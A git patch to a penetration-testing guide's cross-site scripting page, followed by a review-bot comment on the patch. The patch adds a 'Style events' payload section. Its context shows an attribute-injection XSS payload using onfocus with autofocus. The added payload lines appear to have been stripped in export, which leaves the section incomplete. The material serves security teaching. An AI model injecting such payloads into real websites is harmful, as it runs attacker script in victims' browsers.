From 7517161d89b32479089a865d2b528403db6c5d7e Mon Sep 17 00:00:00 2001 From: CPol Date: Thu, 25 Feb 2021 11:06:26 +0000 Subject: [PATCH] GitBook: [master] one page modified --- pentesting-web/xss-cross-site-scripting/README.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md index 9b6054b3..a9f5aedc 100644 --- a/pentesting-web/xss-cross-site-scripting/README.md +++ b/pentesting-web/xss-cross-site-scripting/README.md @@ -190,6 +190,18 @@ If you **cannot escape from the tag**, you could create new attributes inside th " autofocus onfocus=alert(document.domain) x=" ``` +#### Style events + +```python +

XSS

+

XSS

+ +#ayload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked: +
+#moving your mouse anywhere over the page (0-click-ish): +
+``` + ### Within the attribute Even if you **cannot escape from the attribute** \(`"` is being encoded or deleted\), depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked.
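Review bot: The fence opened under `#### Style events` is tagged `python`, but the two comment lines inside it describe markup placed in a page (an invisible overlay, mouse movement over the page), so the tag should be `html` or dropped, and the `#` comment lines should either become HTML comments or move out of the fence as prose. The first comment, `#ayload that injects an invisible overlay ...`, is missing its leading "P". The new heading goes straight into the fence with no sentence saying what a style event is or when the technique applies, while the neighbouring sections each open with one ("If you **cannot escape from the tag** ...", "Even if you **cannot escape from the attribute** ..."); a one-line introduction would keep the page consistent. As shown here, the lines following both comments are empty, so it is worth confirming the content they refer to survived the GitBook export.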